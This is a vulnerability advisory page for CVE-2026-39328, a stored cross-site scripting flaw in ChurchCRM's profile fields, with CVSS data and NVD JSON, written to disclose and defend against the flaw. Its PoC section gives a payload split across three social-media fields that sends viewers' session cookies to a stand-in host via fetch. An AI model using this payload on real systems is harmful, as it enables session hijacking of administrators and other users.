CVE-2026-39328

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, a stored cross-site scripting vulnerability exists in ChurchCRM's person profile editing functionality. Non-administrative users who have the EditSelf permission can inject malicious JavaScript into their Facebook, LinkedIn, and X profile fields. Due to a 50-character field limit, the payload is distributed across all three fields and chains their onfocus event handlers to execute in sequence. When any user, including administrators, views the attacker's profile, their session cookies are exfiltrated to a remote server. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score

8.9

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE

ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Payload distribution strategy due to 50-char limit per field
// Field 1: Facebook URL
"autofocus onfocus=\"s='htt"

// Field 2: LinkedIn URL
"p://evil.com/?c='"

// Field 3: X (Twitter) URL
";fetch(s+document.cookie)\""

// Note: When an admin views the profile, the browser renders these inputs.
// The autofocus triggers the first onfocus, executing the concatenated JS.
// Result: fetch('http://evil.com/?c=' + document.cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39328
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39328
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39328/
[4] VulDB https://vuldb.com/cve/CVE-2026-39328
[5] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-fcp5-pwvj-v7xm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39328", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:44.043", "lastModified": "2026-04-10T20:56:24.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, a stored cross-site scripting vulnerability exists in ChurchCRM's person profile editing functionality. Non-administrative users who have the EditSelf permission can inject malicious JavaScript into their Facebook, LinkedIn, and X profile fields. Due to a 50-character field limit, the payload is distributed across all three fields and chains their onfocus event handlers to execute in sequence. When any user, including administrators, views the attacker's profile, their session cookies are exfiltrated to a remote server. This vulnerability is fixed in 7.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-fcp5-pwvj-v7xm", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}